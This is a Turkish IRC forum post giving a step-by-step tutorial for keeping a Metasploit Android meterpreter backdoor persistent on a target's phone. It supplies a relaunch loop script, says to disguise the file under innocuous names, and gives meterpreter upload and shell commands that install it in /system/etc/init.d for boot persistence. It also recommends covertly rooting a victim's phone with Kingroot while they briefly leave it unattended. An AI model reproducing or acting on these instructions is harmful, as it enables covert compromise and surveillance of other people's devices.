lookjapan.COM - IRC ve mIRC dünyasının forumu!

lookjapan.COM - IRC ve mIRC dünyasının forumu! (http://www.lookjapan.com/index.php)
-   Ağ - Network - Networking (http://www.lookjapan.com/forumdisplay.php?f=206)
-   -   Android backdoor kalıcık özelliği (http://www.lookjapan.com/showthread.php?t=2648)

Siyah 02 Kasım 2015 08:37

Android backdoor kalıcık özelliği
 
Şimdi içinde bulunduğun konuda ise, bunu anlatacağım. Hemen hemen, uzun bir işlem olacaktır.

1- Yeni bir terminal açın.

2- Şu komutu girin ; leafpad

3- Açılacak sayfaya şu kodları yapıştın;

#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

4- Yapıştırdıktan sonra, şüphe çekmeyecek şekilde kaydedin. Örneğin; sdcard.sh veya system.sh (uzantısı .sh olmalıdır.)

-----
Önemli: Kaydettiğiniz dosyayı, Masaüstüne kaydettiğinizi varsayacağım ve ona göre anlatacağım.
Önemli: Hedef telefonda, root yetkisi var ise istediğiniz şekilde kaydedin. (Uzantısı .sh olmak şartıyla)
-----

5- Bilgisayardan, backdooru başlatın.
-----
Başlatmak için, küçük hatırlatmalar: msfconsole - set PAYLOAD android/meterpreter/reverse_tcp - exploit
Veya bknz: [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]
Örnek olarak:
[Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]

Şimdi, ise yapmanız gereken işlemlere geçiyorum...

EĞER ROOT YETKİSİ BULUNUYORSA YAPILMASI GEREKENLER;


1- Backdoor'u kontrol ettiğiniz terminalde, oluşturduğunuz dosyayı telefona upload edeceksiniz. Şu komutu girin.
-----

upload /root/Masaüstü/sdcard1.sh /system/etc/init.d

Önemli: Benim oluşturduğum dosyanın ismi sdcard1.sh bu nedenle siz kendi dosya isminizi girin.

-----

2- Şimdi ise, aynı terminale şu kodları girmeniz gerekecektir.
-----

shell

cd /
cd /system/etc/init.d
sh sdcard1.sh

Önemli: Bu sh.sdcard1.sh komutundan sonra, ne olur ne olmaz 30 saniye bekleyin ve ardından ctrl+c yapıp çıkabilirsiniz. Nedeni ise, sakatlık çıkmasın diyeyim. Telefon donabilir, takılabilir. Arkayı sağlama alalım.

-----

Ve işlemler bitti!

EĞER ROOT YETKİSİ BULUNMUYORSA YAPILMASI GEREKENLER;

-----
Not: Öncelikle neden root yetkisi bulunan ve bulunmayanlar için ayrı işlem yapılması gerektiğini açıklamak istiyorum. Eğer hedef telefonda root yetkisi varsa, yapacağınız işlemlerden sonra, telefon kapanıp açılsa da, backdoor otomatik olarak açılacaktır. Fakat... Telefonda root yetkisi bulunmuyorsa, backdoor telefon yeniden başlatılana kadar kendisini otamatik olarak açıcaktır.

Kısaca;
Root yetkili : Daima aktiftir.
Yetkisiz: Sadece telefon kapanıp açılana kadar.
-----

1- Backdoor'u kontrol ettiğiniz terminalde, oluşturduğunuz dosyayı telefona upload edeceksiniz. Şu komutu girin.
-----

upload /root/Masaüstü/sdcard1.sh /sdcard

Önemli: Ben direk, sdcard dizinine attım. Dilerseniz, başka bir klasöre atıp gizleyebilirsiniz.
Önemli: Benim oluşturduğum dosyanın ismi sdcard1.sh bu nedenle siz kendi dosya isminizi girin.

-----

2- Şimdi ise, aynı terminale şu kodları girmeniz gerekecektir.
-----

shell

cd /
cd /sdcard
sh sdcard1.sh

Önemli: Bu sh.sdcard1.sh komutundan sonra, ne olur ne olmaz 30 saniye bekleyin ve ardından ctrl+c yapıp çıkabilirsiniz. Nedeni ise, sakatlık çıkmasın diyeyim. Telefon donabilir, takılabilir. Arkayı sağlama alalım.

-----

Ve artık herşey tamamdır...
Fakat bu root olayı canınızı sıktıysa, size bir tavsiye vereyim.
-----
Android telefonlar için "Kingroot" gibi yazılımlar gördüm. Bunun gibi yazılımlar, neredeyse android telefonların çoğunda çalışır. Bu yazılım, tek dokunuşla 20-25 saniyede root yapabilir ve tek dokunuşla root kaldırabilir.

Yani yerinizde olsaydım, kendi hafıza kartıma bu uygulamayı atardım. Hedef kişi telefon başından 2-3 dakika ayrıldığında kendi hafıza kartımı takıp yazılımı yüklerdim. Ardından, bilgisayardan /system/etc/init.d klasörüne upload ederdim. Eğer bilgisayarın olmayacağını varsayarsak, sdcard1.sh uzantılı dosyayı da hafıza kartına atıp, kendim upload ederdim.
Upload ettikten sonra ise, zaten kendisi reboot yaptıktan sonra çalışacaktır.


All times are GMT +3. The time now is 11:09.

Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.